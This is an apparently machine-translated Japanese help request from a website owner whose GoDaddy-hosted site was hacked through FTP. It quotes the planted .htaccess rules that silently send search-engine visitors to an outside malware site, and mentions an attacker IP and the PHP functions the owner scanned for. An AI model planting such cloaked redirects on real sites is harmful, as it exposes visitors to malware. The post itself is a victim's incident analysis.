私のサイトはハッキングされており、現時点ではいくつかの詳細を知っていますが、それがどのように発生したのか、または将来的にそれを防ぐ方法に正確に途方に暮れています。攻撃が再び発生するのを防ぐため、攻撃を分析するためにあなたの助けが必要です。これは少し長いですが、問題の解決に役立つ十分な情報を提供したいと思います。
これが起こったことです。
数週間前、ホスティング会社のGoDaddyからメールが届きました。私のサイトはリソースを使いすぎており、MySQLクエリが原因であると予想していました。問題のクエリは、5〜6語の検索クエリでした。私が設定した方法では、検索する用語が多いほど、クエリが複雑になります。問題ない。私はそれを修正しましたが、同時にGoDaddyも一時的に私のアカウントをシャットダウンし、すべてが正常に戻るまでに約3日かかりました。
その事件の後、私の検索エンジンのトラフィックは劇的に、約90%減少しました。私はそれを何も考えていなかったので、それをクエリの大失敗に書いて、グーグルがサイトを再クロールしたときにそれが時間内に戻ると考えて、それはうんざりしました。そうではなかった。
数日前、自分のサイトでマルウェアがホストされているというメールがユーザーから届きました。ブラウザに直接サイトを読み込みましたが、ページに何も挿入されていませんでした。次に、.htaccessファイルを確認したところ、次のことがわかりました。
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>
可愛い。そして少しうそをつく。アドレスバーまたはブックマークからサイトに直接移動すると、通常、サイトは通常どおり読み込まれます。検索エンジンからのリンクを介して自分のサイトにアクセスすることはめったにないので、ハッキングが検出されない限り、ハッキングが検出されませんでした。また、マルウェアは私のサイトで直接ホストされていませんでした。
簡単な検索で他の人も同じ問題を抱えていることがわかりましたが、まだそれを検出していない人はもっとたくさんいると思います。ほとんどの推奨事項は、ソフトウェアの最新バージョンへのアップグレード、パスワードの変更などです。
ユビキタスなWordpressではなく、独自のカスタムコンテンツ管理システムを使用しているため、少し深く掘り下げました。私はすべてのファイルをスキャンして、PHPのエクスプロイトで使用される一般的な関数を探しました:base64_decode、exec、shellなど...疑わしいものは何も見つかりませんでした。
次にGoDaddyのファイルマネージャーの履歴を確認したところ、.htaccessファイルが、検索クエリがサーバーリソースを使い果たしたと非難されたときとまったく同じ日に変更されていることがわかりました。残念ながら偶然かもしれませんが、よくわかりません。.htaccessファイルのリダイレクトはリソースを大量に消費しているようには見えず、クエリはリソースを大量に消費するほど複雑でした。
私のコードが問題ではないことを確認したかったので、.htaccessファイルが変更されたときにトラフィックログを調べて、疑わしいアクティビティがないか確認しましたが、異常または類似のGETまたはPOSTアクティビティはありませんでしたハッキングの試み。
最後に、GoDaddyにFTPログを要求したところ、.htaccessファイルが変更されたときに不正なFTPアクセスがあったことがわかりました。当時は休暇中で、コンピューターが物理的にシャットダウンされており、アクセス資格情報を持つユーザーは他にいませんでした。FTPでアカウントにプライマリFTPユーザーを使用したようですが、IPは91.220.0.19で、ラトビアのものであるようです。
共有ホスティングでは、GoDaddyがサイトURLに基づいてプライマリFTPユーザー名を自動的に割り当てるようです。それは非常に予測可能です。少なくとも、ホスティングアカウントを設定したときのことです。私は数年前に最初にホスティングアカウントにサインアップしたため、変更された可能性がありますが、覚えている限りでは、プライマリFTPユーザー名を選択できませんでした。現在、ユーザー名を変更することもできません。アカウントをキャンセルして辞任しない限り、GoDaddyも変更できないようです。他のFTPユーザーを作成、削除、編集できますが、プライマリFTPユーザーは削除できません。変更できるのはパスワードのみです。
プライマリFTPユーザー名を除いて、サイト、データベース、管理者、およびアカウントのすべてのアクセス資格情報は、猫がキーボードの上を歩いたように見える、意味不明でランダムなユーザー名とパスワードです。例:lkSADf32!$ asJd3。
リンクの弱点に備えて、ウイルスやマルウェアなどがないかコンピュータを徹底的にスキャンしましたが、何も見つかりませんでした。ファイアウォールとウイルス対策プログラムを使用していて、安全なブラウジング習慣を使用するようにしています。
サイトを更新するときは、Core FTP LEとSSH / SFTP接続を使用します。ホスティングアカウントはLinuxセットアップです。
GoDaddyのテクニカルサポートと話していると、FTPパスワードがどのように侵害されたかはわかりません。共有ホスティングでは、FTPユーザーレベルでIPブロックを配置できません。また、プライマリFTPユーザー名を変更することもできません。FTPアクセスに関するブルートフォース保護があるかどうかを尋ねたところ、最初は不確かに聞こえましたが、何度か言い直したところ、そうでした。ただし、前の電話で同じ質問をして、GoDaddyにはFTPアクセスに対するブルートフォース保護がないと聞いたのを覚えていると思います。現時点では、彼らがそうであるかどうかはわかりません。
私はすべてのアクセス資格情報を全面的に変更し、.htaccessファイルを使用してラトビアのIPアドレスを禁止しました(FTPを使用している場合はおそらく違いがありません)が、FTPの方法はまだわかりませんもともとパスワードが危険にさらされていました。
私のコードに問題がなかった(それが原因であったとしても、FTP情報が公開されるべきではなかった)か、コンピューターに問題がなかったのはかなり確実です。私が疑うが、証明する方法がわからないのは、ユーザー名が予測可能だったためにFTPパスワードがブルートフォースされたということです。ブルートフォース攻撃は、サーバーのリソースが使い果たされている(クエリで非難されている)と同時に発生した可能性もありますが、それが可能か、それとも可能性があるかを知るのに十分なサーバーの技術的な側面は知りません。
今、私は私が何をすべきかを知っていることの終わりにいるような気がします。攻撃がどのように実行され、それを防ぐ方法を理解できるようにしたいので、攻撃ベクトル、実行可能な診断、または追加のセキュリティ対策について他にアイデアがあれば、とても感謝しています。ホストを変更したり、共有ホスティングを中止したりする以上のことはできますが、これが再発しないようにしたいのですが。
オビ=ワン・ケノービ...